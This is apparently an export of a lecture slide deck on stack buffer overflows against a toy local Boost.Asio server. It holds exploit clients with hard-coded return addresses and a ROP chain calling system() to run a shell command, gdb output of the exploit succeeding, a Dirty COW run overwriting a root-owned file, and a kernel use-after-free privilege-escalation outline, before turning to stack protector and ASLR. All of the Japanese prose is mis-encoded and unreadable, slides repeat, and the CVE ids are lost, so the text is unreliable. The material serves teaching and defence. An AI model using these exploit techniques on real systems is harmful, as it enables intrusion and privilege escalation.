    #2 0x000000000a0d2e2e in ?? ()
    returnΞυϨε͕ॻ͖׵Θͬͨঢ়ଶͰretqͨ݁͠Ռ
    ΞυϨε͕ࢦ͢ઌͷϝϞϦʹΞΫηεͰ͖ͳ͔ͬͨҝ
    ൣғ֎ࢀরͰϓϩηε͕ఀࢭͨ͠
    όοϑΝΦʔόʔϥϯʹΑͬͯ
    ഑ྻreceivedͷઌʹஔ͍ͯ͋ͬͨ
    returnΞυϨε͕ॻ͖׵͑ΒΕͯ͠·ͬͨ


  31. ॻ͖׵͑ΒΕͨΞυϨε͕
    ΞΫηεՄೳͩͬͨΒ
    Կ͕ى͍ͬͯͨ͜


  32. #include
    #include
    // Demo client from the slide: connects to the echo server on 127.0.0.1:20000 and
    // sends a single CRLF-terminated line that is longer than the server's 32-byte
    // stack buffer. The first 32 bytes are filler; the values that follow appear to be
    // laid out to land on session::on_read's saved registers and return address (see
    // the gdb slides). They are specific to the presenter's binary and environment and
    // have no meaning anywhere else.
    int main() {
    namespace asio = boost::asio;
    using boost::asio::ip::tcp;
    asio::io_service io_service;
    tcp::socket socket(io_service);
    socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) );
    std::vector< uint8_t > data {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xe0, 0x24, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
    0x0d, 0x0a,
    };
    boost::system::error_code error;
    asio::write(socket, asio::buffer(data), error);
    return 0;
    // Everything below is unreachable: the `return 0;` above exits before the reply
    // is read, and the write's `error` is consequently never inspected either.
    if( !error ) {
    asio::streambuf receive_buffer;
    asio::read_until(socket, receive_buffer, '\n', error);
    std::cout << asio::buffer_cast(receive_buffer.data()) << std::endl;
    }
    }
    ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ


  33. #include
    #include
    // Demo client from the slide: connects to the echo server on 127.0.0.1:20000 and
    // sends a single CRLF-terminated line that is longer than the server's 32-byte
    // stack buffer. The first 32 bytes are filler; the values that follow appear to be
    // laid out to land on session::on_read's saved registers and return address (see
    // the gdb slides). They are specific to the presenter's binary and environment and
    // have no meaning anywhere else.
    int main() {
    namespace asio = boost::asio;
    using boost::asio::ip::tcp;
    asio::io_service io_service;
    tcp::socket socket(io_service);
    socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) );
    std::vector< uint8_t > data {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xe0, 0x24, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
    0x0d, 0x0a,
    };
    boost::system::error_code error;
    asio::write(socket, asio::buffer(data), error);
    return 0;
    // Everything below is unreachable: the `return 0;` above exits before the reply
    // is read, and the write's `error` is consequently never inspected either.
    if( !error ) {
    asio::streambuf receive_buffer;
    asio::read_until(socket, receive_buffer, '\n', error);
    std::cout << asio::buffer_cast(receive_buffer.data()) << std::endl;
    }
    }
    (gdb) disas abort
    Dump of assembler code for function abort:
    0x00007ffff6f624e0 <+0>: sub $0x128,%rsp
    0x00007ffff6f624e7 <+7>: mov %fs:0x10,%rdx

    Cݴޠඪ४ϥΠϒϥϦͷabortؔ਺ͷΞυϨε͕
    ελοΫͷreturnΞυϨεͷҐஔʹདྷΔΑ͏ʹ
    αʔόʹૹΔσʔλΛ࡞Δ


  34. $ ./pktgen
    ΫϥΠΞϯτ αʔό
    $ gdb -q ./tiny_server
    Reading symbols from ./tiny_server...done.
    (gdb) run
    Starting program: /home/fadis/tiny_server
    [Thread debugging using libthread_db
    enabled]
    Using host libthread_db library "/lib64/
    libthread_db.so.1".
    Program received signal SIGABRT, Aborted.
    0x00007ffff6f61228 in raise () from /
    lib64/libc.so.6
    (gdb) backtrace
    #0 0x00007ffff6f61228 in raise () from /
    lib64/libc.so.6
    #1 0x00007ffff6f6264a in abort () from /
    lib64/libc.so.6
    #2 0x0000000000000a0d in ?? ()
    #3 0x00007fffffffd5d0 in ?? ()
    SIGSEGVͰ͸ͳ͘SIGABRTͰαʔό͕ఀࢭͨ͠


  35. Program received signal SIGABRT, Aborted.
    0x00007ffff6f61228 in raise () from /
    lib64/libc.so.6
    (gdb) backtrace
    #0 0x00007ffff6f61228 in raise () from /
    lib64/libc.so.6
    #1 0x00007ffff6f6264a in abort () from /
    lib64/libc.so.6
    #2 0x0000000000000a0d in ?? ()
    #3 0x00007fffffffd5d0 in ?? ()
    #4 0x0000000000000042 in ?? ()
    #5 0x0000000000632ef0 in ?? ()
    #6 0x00007fffffffd340 in ?? ()
    #7 0x0000000000412898 in
    boost::get_pointer (
    p=access memory at address
    0xfffffffffffffff9>)
    at /usr/include/boost/get_pointer.hpp:
    69
    Backtrace stopped: previous frame inner to
    this frame (corrupt stack?)
    αʔόͷίʔυ্Ͱ͸
    ݺΜͰ͍ͳ͍
    abortؔ਺͕
    ݺ͹Εͨ͜ͱʹͳ͍ͬͯΔ


  36. ߈ܸऀ͕ࢦఆͨؔ͠਺͕
    ࣮ߦ͞Εͯ͠·ͬͨ


  37. ߈ܸऀ͸αʔόͷίϯτϩʔϧΛखʹೖΕ͍ͨ
    ͦͷͨΊʹ͸shellΛىಈ͍ͨ͠
    खͬऔΓૣ͘shellΛ্ཱͪ͛Δʹ͸
    system("࣮ߦ͍ͨ͠ίϚϯυ");
    Λݺ΂Ε͹ྑ͍
    ೚ҙͷؔ਺Λݺ΂Δ͚ͩͰͳ͘
    ೚ҙͷจࣈྻΛҾ਺ͱͯ͠౉ͤΔඞཁ͕͋Δ


  38. [1] System V Application Binary Interface AMD64 Architecture Processor Supplement
    §3.5.7 Variable Argument Lists
    x86_64 LinuxͰ͸ؔ਺ͷୈҰҾ਺͸
    %rdiϨδελͰ౉͢͜ͱʹͳ͍ͬͯΔ[1]
    ࣮ߦ͍ͨ͠ίϚϯυΛϝϞϦʹॻ্͍ͨͰ
    Կͱ͔ͯͦ͠ͷΞυϨεΛ%rdiʹ৐ͤͯ
    retqͰؔ਺Λݺͼग़͢ඞཁ͕͋Δ
    rax rbp r8 r12
    rbx rsp r9 r13
    rcx rsi r10 r14
    rdx rdi r11 r15


  39. (gdb) disas _ZNSi6ignoreEl

    0x00007ffff788dfc5 <+309>: pop %r14
    0x00007ffff788dfc7 <+311>: retq
    0x7ffff788dfc5
    ඪ४ϥΠϒϥϦ౳͔Βpopͯ͠retq͍ͯ͠ΔॴΛ୳ͯ͘͠Δ
    %r14ʹஔ͖͍ͨ஋
    ͦͷޙʹ࣮ߦ͍ͨ͠ΞυϨε
    ελοΫʹࠨͷΑ͏ʹॻ͍ͯretq͢Δͱ
    %r14ʹ೚ҙͷ஋Λஔ͘͜ͱ͕Ͱ͖Δ
    Return Oriented Programming
    ૢ࡞͍ͨ͠ϨδελΛpopͯ͠retq͍ͯ͠ΔॴΛݟ͚ͭΕ͹
    ೚ҙͷҾ਺Λ͚ͭͯ೚ҙͷؔ਺Λݺͼग़͢͜ͱ͕Ͱ͖Δ


  40. #include
    #include
    int main() {
    namespace asio = boost::asio;
    using boost::asio::ip::tcp;
    asio::io_service io_service;
    tcp::socket socket(io_service);
    socket.connect(
    tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 )
    );
    const std::vector< uint8_t > command{
    't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    };
    std::vector< uint8_t > data {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
    0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00,
    0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
    ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ
    ద౰ͳϑΝΠϧΛ࡞੒


  41. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
    0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00,
    0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
    0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00,
    0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00
    };
    for( size_t i = 0u; i != 10u; ++i )
    std::copy( command.begin(), command.end(), std::back_inserter( data ) );
    data.push_back( 0x0d );
    data.push_back( 0x0a );
    boost::system::error_code error;
    asio::write(socket, asio::buffer(data), error);
    return 0;
    if( !error ) {
    asio::streambuf receive_buffer;
    asio::read_until(socket, receive_buffer, '\n', error);
    std::cout << asio::buffer_cast(receive_buffer.data()) << std::endl;
    }
    }
    ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ


  42. tcp::socket socket(io_service);
    socket.connect(
    tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 )
    );
    const std::vector< uint8_t > command{
    't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    };
    std::vector< uint8_t > data {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
    0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00,
    0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
    0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00,
    0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00
    };
    for( size_t i = 0u; i != 10u; ++i )
    std::copy( command.begin(), command.end(), std::back_inserter( data ) );
    data.push_back( 0x0d );
    ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ
    pop rdiͯ͠retqͯ͠Δίʔυʹ
    ඈͿͨΊͷΞυϨε
    rdiʹ৐ͤΔ஋
    ࣮ߦ͍ͨ͠ίϚϯυ

    system()
    sync()
    exit()
    γΣϧεΫϦϓτ


  43. $ ./pktgen
    ΫϥΠΞϯτ αʔό
    $ gdb -q ./tiny_server
    Reading symbols from ./tiny_server...done.
    (gdb) run
    Starting program: /home/fadis/tiny_server
    [Thread debugging using libthread_db
    enabled]
    Using host libthread_db library "/lib64/
    libthread_db.so.1".
    [Inferior 1 (process 11310) exited with
    code 02]
    (gdb) quit
    $ ls
    a tiny_server
    ͳΜ͔Ͱ͖ͯΔ


  44. ߈ܸऀ͕αʔό্Ͱ
    ೚ҙͷૢ࡞Λग़དྷͯ͠·ͬͨ


  45. ߈ܸऀ͕࣮ߦͨ͠shell͸
    ߈ܸΛड͚ͨϓϩηεΛ࣮ߦͨ͠ϢʔβͷݖݶͰಈ͘
    ߈ܸΛड͚ͨϓϩηε͕
    rootͰಈ͍͍ͯͳ͔ͬͨ৔߹
    ߈ܸऀ͸αʔόͷ׬શͳঠѲͷͨΊʹ
    ݖݶঢ֨Λߦ͏ඞཁ͕͋Δ
    Permission Denied


  46. ݖݶঢ֨ʹ༻͍ΒΕΔ੬ऑੑͷྫ
    https://dirtycow.ninja/
    ͜͜ʹ
    DIRTY COWͷτοϓϖʔδΛషΔ


  47. DIRTY COW(CVE-2016-5195)
    mmap࣌ʹMAP_PRIVATEΛ͚ͭΔͱ
    ϑΝΠϧʹର͢Δॻ͖ࠐΈΛ
    ΦϦδφϧͷϑΝΠϧʹ
    ॻ͔ͳ͍Α͏ʹ͢Δ͜ͱ͕Ͱ͖Δ
    ॻ͖ࠐΈ
    ಡΈग़͠
    ϓϩηε͔Β
    ݟͨϑΝΠϧ
    ΦϦδφϧͷ
    ϑΝΠϧ
    ΞυϨεۭؒ


  48. DIRTY COW(CVE-2016-5195)
    ʮ࢑͘࢖Θͳ͍͔Βॻ͖ࠐΈͷ४උΛϝϞϦ͔ΒԼ͛ͯྑ͍ʯ
    ࢦఆΛߦ͏ͷͱಉ࣌ʹॻ͖ࠐΈΛߦ͏ͱ
    ΦϦδφϧͷϑΝΠϧʹॻ͍ͯ͠·͏ෆ۩߹
    ΦϦδφϧͷϑΝΠϧʹ
    ॻ͖ʹ͍ͬͯ͠·͏
    ϓϩηε͔Β
    ݟͨϑΝΠϧ
    ΦϦδφϧͷ
    ϑΝΠϧ
    MADV_DONTNEEDͰ
    ϝϞϦ͔ΒԼ͛Δ


  49. DIRTY COW(CVE-2016-5195)
    https://github.com/kcgthb/RHEL6.x-COW/blob/master/6.7/noc0w.patch
    ͜ͷෆ۩߹ࣗମ͸ෳࡶͳ΋ͷͰ͸ͳ͘मਖ਼ύον͸ߦఔ
    ͜͜ʹ
    DIRTY COWͷमਖ਼ύονΛషΔ


  50. DIRTY COW(CVE-2016-5195)
    root # echo 'abcde' >sample.txt
    root # ls -lha sample.txt
    -rw-r--r-- 1 root root 6 Mar 18 11:21 sample.txt
    root # logout
    non_root $ cat sample.txt
    abcde
    non_root $ ./dirtyc0w sample.txt 'pwned'
    mmap 7f214599a000
    ^C
    non_root $ cat sample.txt
    pwned
    non_root $ ls -lha sample.txt
    -rw-r--r-- 1 root root 6 3݄ 18 11:21 sample.txt
    ҰൠϢʔβ͕
    root͔͠ॻ͚ͳ͍ϑΝΠϧΛ
    ॻ͖׵͑ͯ͠·ͬͨ
    ͜Ε͕ՄೳͳΒrootϩάΠϯͷೝূΛແ͘͢͜ͱͩͬͯग़དྷΔ


  51. CVE-2017-15265
    ALSA Sequencer[1]ͷϙʔτΛ࡞͙ͬͯ͢ʹഁغ͢Δ
    [1] ALSA Sequencer http://www.alsa-project.org/~frank/alsa-sequencer/index.html
    Ϣʔβۭؒ Χʔωϧۭؒ
    ϙʔτ͍ͩ͘͞
    Ͳ͏ͧ
    ϙʔτͷͨΊͷ
    ྖҬͷ֬อ
    ϙʔτΛॳظԽ
    εϨου1 εϨου1
    ϙʔτ΋͏͍͍΍ ϙʔτͷͨΊͷ
    ྖҬͷղ์
    εϨου2 εϨου2
    ͠Α͏ͱࢥͬͨΒ
    ແ͔ͬͨ


  52. ͜͜ʹ
    LinuxΧʔωϧͷ
    ALSA SequencerͷॳظԽதͰ
    ίʔϧόοΫΛಡΜͰ͍ΔՕॴΛషΔ
    Use After Free
    Χʔωϧͷߏ଄ମʹ͸ଟ਺ͷίʔϧόοΫؔ਺͕ઃఆ͞Ε͍ͯΔ
    ղ์ࡁΈͷϝϞϦ͸ಉαΠζͷϝϞϦΛ֬อ͢Δͱ
    ߴ֬཰Ͱಉ͡ྖҬΛऔಘͰ͖Δ
    ίʔϧόοΫΛ೚ҙͷΞυϨεʹॻ͖׵͑ͯΧʔωϧʹݺ͹ͤΔ
    https://elixir.bootlin.com/linux/v4.15.10/source/sound/core/seq/seq_clientmgr.c#L619
    ϙʔτ͸΋͏ղ์͞ΕͯΔ͚Ͳ
    ͜͜Ͱϙʔτʹઃఆ͞Εͨ
    ίʔϧόοΫΛݺΜͰΔ


  53. Use After Free
    ͜ΕΛར༻ͯ͠ԿΛݺ͹ͤΔ͔
    ͦΕ͸΋ͪΖΜ
    commit_creds( prepare_kernel_cred( NULL ) );
    ༁ԶΛrootʹ͠Ζ
    ղ์ࡁΈͷྖҬ͔ΒίʔϧόοΫΛݺͿঢ়ଶʹ͑͞Ͱ͖Ε͹
    ͜ͷ߈ܸ͕੒ཱ͢ΔՄೳੑ͕͋ΔͨΊ
    Use After FreeΛ࢖ͬͨݖݶঢ֨੬ऑੑ͸සൟʹݟ͔ͭΔ


  54. Use After Free
    CVE-[id lost in export]
    CVE-[id lost in export]
    CVE-[id lost in export]
    ղ์ࡁΈͷྖҬ͔ΒίʔϧόοΫΛݺͿঢ়ଶʹ͑͞Ͱ͖Ε͹
    ͜ͷ߈ܸ͕੒ཱ͢ΔՄೳੑ͕͋ΔͨΊ
    Use After FreeΛ࢖ͬͨݖݶঢ֨੬ऑੑ͸සൟʹݟ͔ͭΔ
    CVE-[id lost in export]
    CVE-[id lost in export]
    CVE-[id lost in export]
    CVE-[id lost in export]


  55. ߈ܸऀ͕αʔόΛ
    ׬શʹঠѲͯ͠͠·ͬͨ


  56. ࠣࡉͳෆ۩߹͕
    ͠͹͠͹αʔόͷ
    ηΩϡϦςΟΛ୆ແ͠ʹ͢Δ


  57. Ұ൪ྑ͍ͷ͸ෆ۩߹͕ແ͍ࣄ͕ͩ
    ͦ͏͸͍ͬͯ΋ෆ۩߹͸ग़ͯ͘ΔͷͰ
    ෆ۩߹͸ग़Δ΋ͷͱͯ͠
    ग़དྷΔ͚ͩக໋తͳ߈ܸʹ௚݁ͤ͞ͳ͍ҝͷ
    ରॲΛߦ͏ඞཁ͕͋Δ


  58. stack protector
    f:
    push %rbp
    mov %rsp,%rbp
    sub $0x20,%rsp
    mov %edi,-0x14(%rbp)
    mov %esi,-0x18(%rbp)
    mov %fs:0x28,%rax
    mov %rax,-0x8(%rbp)
    xor %eax,%eax
    mov -0x14(%rbp),%edx
    mov -0x18(%rbp),%eax
    add %edx,%eax
    mov -0x8(%rbp),%rcx
    xor %fs:0x28,%rcx
    je 40055f
    callq 400400 <__stack_chk_fail@plt>
    leaveq
    retq
    f:
    push %rbp
    mov %rsp,%rbp
    mov %edi,-0x4(%rbp)
    mov %esi,-0x8(%rbp)
    mov -0x4(%rbp),%edx
    mov -0x8(%rbp),%eax
    add %edx,%eax
    pop %rbp
    retq
    ͋Δ࣌
    ͳ͍࣌
    gccͷ࠷దԽΦϓγϣϯͷ1ͭ
    ͳΜ͔
    ૿͑ͯΔ


  59. stack protector
    f:
    push %rbp
    mov %rsp,%rbp
    sub $0x20,%rsp
    mov %edi,-0x14(%rbp)
    mov %esi,-0x18(%rbp)
    mov %fs:0x28,%rax
    mov %rax,-0x8(%rbp)
    xor %eax,%eax
    mov -0x14(%rbp),%edx
    mov -0x18(%rbp),%eax
    add %edx,%eax
    mov -0x8(%rbp),%rcx
    xor %fs:0x28,%rcx
    je 40055f
    callq 400400 <__stack_chk_fail@plt>
    leaveq
    retq
    ͋ΔݻఆͷΞυϨε͔ΒಡΜͩ஋Λ
    ελοΫʹੵΉ
    ઌఔͱಉ͡ΞυϨε͔ΒಡΜͩ஋ͱ
    ελοΫͷ஋Λൺֱ͠
    Ұக͠ͳ͔ͬͨΒabort͢Δ


  60. stack protector
    ؔ਺gͷม਺
    ؔ਺gͷม਺
    ؔ਺gͷม਺
    ؔ਺f͕ऴΘͬͨΒ໭ΔҐஔ
    ؔ਺fͷม਺
    ؔ਺fͷม਺
    ؔ਺gͷrbp
    ϥϯμϜͳ஋
    όοϑΝΦʔόʔϥϯͰ
    returnΞυϨεΛॻ͖׵͑Δʹ͸
    ͜͜·Ͱॻ͖ࠐΉඞཁ͕͋Δ
    ؒʹڬ·͍ͬͯΔ
    ͜ͷ஋Λॻ͖׵͑ͯ͠·͏ͱ
    ϓϩάϥϜ͸ҟৗऴྃ͢Δ
    όοϑΝΦʔόʔϥϯΛར༻ͨ͠
    ೚ҙͷίʔυͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ


  61. stack protector
    xor %eax,%eax
    mov -0x14(%rbp),%edx
    mov -0x18(%rbp),%eax
    add %edx,%eax
    mov -0x8(%rbp),%rcx
    xor %fs:0x28,%rcx
    je 40055f
    callq 400400 <[email protected]>
    leaveq
    retq
    ઌఔͱಉ͡ΞυϨε͔ΒಡΜͩ஋ͱ
    ελοΫͷ஋Λൺֱ͠
    Ұக͠ͳ͔ͬͨΒabort͢Δ
    ελοΫ͕ഁյ͞ΕͨޙͳͷͰ
    ຊདྷͷॲཧʹ໭Δ͜ͱ͸Ͱ͖ͳ͍
    stack-protector͸
    ߈ܸऀ͕೚ҙͷίʔυΛ࣮ߦͰ͖Δ੬ऑੑΛ
    ߈ܸऀ͕DoS߈ܸΛͰ͖Δ੬ऑੑʹऑΊΔ


  62. ͜͜ʹ
    RedHatʹΑΔBlueborneͷղઆΛషΔ
    https://access.redhat.com/security/vulnerabilities/blueborne
    ࣮ࡍʹstack protector͕໾ʹཱ͍ͬͯΔέʔε
    Blueborne(CVE-2017-1000251)
    γεςϜʹBluetoothͰ઀ଓͰ͖Δೝূ͞Ε͍ͯͳ͍Ϣʔβ͕
    γεςϜΛΫϥογϡͤ͞Δࣄ͕Ͱ͖Δ
    ͋Δ͍͸stack protector͕༗ޮʹͳ͍ͬͯͳ͍৔߹
    ೚ҙͷίʔυ͕࣮ߦ͞ΕΔՄೳੑ͕͋Δ


  63. stack protector
    stack protector͸ελοΫΛগ͠༨෼ʹ࢖͍
    ϝϞϦΞΫηεͱൺֱ͕༨෼ʹൃੜ͢Δ
    -fno-stack-protector(σϑΥϧτ)
    -fstack-protector(͓͢͢Ί)
    -fstack-protector-all
    stack protectorΛ࢓ֻ͚ͳ͍
    όΠτҎ্ͷจࣈྻΛѻ͏ؔ਺ʹstack protectorΛ࢓ֻ͚Δ
    ͋ΒΏΔؔ਺ʹstack protectorΛ࢓ֻ͚Δ
    ࢓ֻ͚͓ͯ͘ͱ໾ʹཱͭͱ͜Ζ͚ͩʹ࢓ֻ͚͓͖͍ͯͨ


  64. stack protector
    stack protector͸
    ελοΫ্ͰͷϝϞϦഁյΛݕ஌͢Δ
    όοϑΝΦʔόʔϥϯ͕ώʔϓ্ͳͲͷ
    ελοΫҎ֎ͷ৔ॴͰى͜Γ
    ͦΕʹΑͬͯഁյ͞ΕͨΞυϨεʹδϟϯϓ͕Մೳͳ৔߹
    stack protector͸߈ܸΛ๷͙ࣄ͕Ͱ͖ͳ͍


  65. address space layout randomization
    $ cat /proc/self/maps
    00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat

    00608000-00629000 rw-p 00000000 00:00 0 [heap]
    7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
    7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so

    7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack]
    7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar]
    7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso]
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
    $ cat /proc/self/maps
    00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat

    00608000-00629000 rw-p 00000000 00:00 0 [heap]
    7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
    7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so

    7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack]
    7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar]
    7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso]
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
    ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞ΢τΛม͑Δ
    1ճ໨
    2ճ໨


  66. address space layout randomization
    $ cat /proc/self/maps
    00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat

    00608000-00629000 rw-p 00000000 00:00 0 [heap]
    7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
    7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so

    7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack]
    7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar]
    7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso]
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
    $ cat /proc/self/maps
    00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat

    00608000-00629000 rw-p 00000000 00:00 0 [heap]
    7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
    7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so

    7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack]
    7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar]
    7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso]
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
    ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞ΢τΛม͑Δ
    1ճ໨
    2ճ໨
    ελοΫͷΞυϨε͕࣮ߦ͢ΔͨͼʹมԽ͍ͯ͠Δ
    7ffeb0a50000-7ffeb0a72000
    7fffe276e000-7fffe2790000
    system()ʹ౉͢ҝʹॻ͖ࠐΜͩ
    γΣϧεΫϦϓτͷΞυϨε͕ຖճมΘΔҝ
    εΫϦϓτͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ


  67. address space layout randomization
    $ cat /proc/self/maps
    00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat

    00608000-00629000 rw-p 00000000 00:00 0 [heap]
    7f9e54cd8000-7f9e5b63d000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
    7f9e5b63d000-7f9e5b7cc000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so

    7ffeb0a50000-7ffeb0a72000 rw-p 00000000 00:00 0 [stack]
    7ffeb0b87000-7ffeb0b89000 r--p 00000000 00:00 0 [vvar]
    7ffeb0b89000-7ffeb0b8b000 r-xp 00000000 00:00 0 [vdso]
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
    $ cat /proc/self/maps
    00400000-00407000 r-xp 00000000 08:03 35724749 /bin/cat

    00608000-00629000 rw-p 00000000 00:00 0 [heap]
    7f5e24988000-7f5e2b2ed000 r--p 00000000 08:03 78637654 /usr/lib64/locale/locale-archive
    7f5e2b2ed000-7f5e2b47c000 r-xp 00000000 08:03 10430373 /lib64/libc-2.23.so

    7fffe276e000-7fffe2790000 rw-p 00000000 00:00 0 [stack]
    7fffe27c2000-7fffe27c4000 r--p 00000000 00:00 0 [vvar]
    7fffe27c4000-7fffe27c6000 r-xp 00000000 00:00 0 [vdso]
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
    ϓϩηεΛىಈ͢ΔͨͼʹϝϞϦϨΠΞ΢τΛม͑Δ
    1ճ໨
    2ճ໨
    ϥΠϒϥϦͷ഑ஔ΋࣮ߦ͢ΔͨͼʹมԽ
    7f9e5b63d000-7f9e5b7cc000
    7f5e2b2ed000-7f5e2b47c000
    system()౳͕ஔ͔Ε͍ͯΔΞυϨε΋
    ϥϯμϜʹมԽ͢Δҝ
    ೚ҙͷίʔυͷ࣮ߦ͕ͱͯ΋೉͘͠ͳΔ


  68. $ gdb -q ./tiny_server
    Reading symbols from ./tiny_server...done.
    (gdb) set disable-randomization off
    (gdb) run
    Starting program: /home/fadis/tiny_server_test/tiny_server
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib64/libthread_db.so.1".
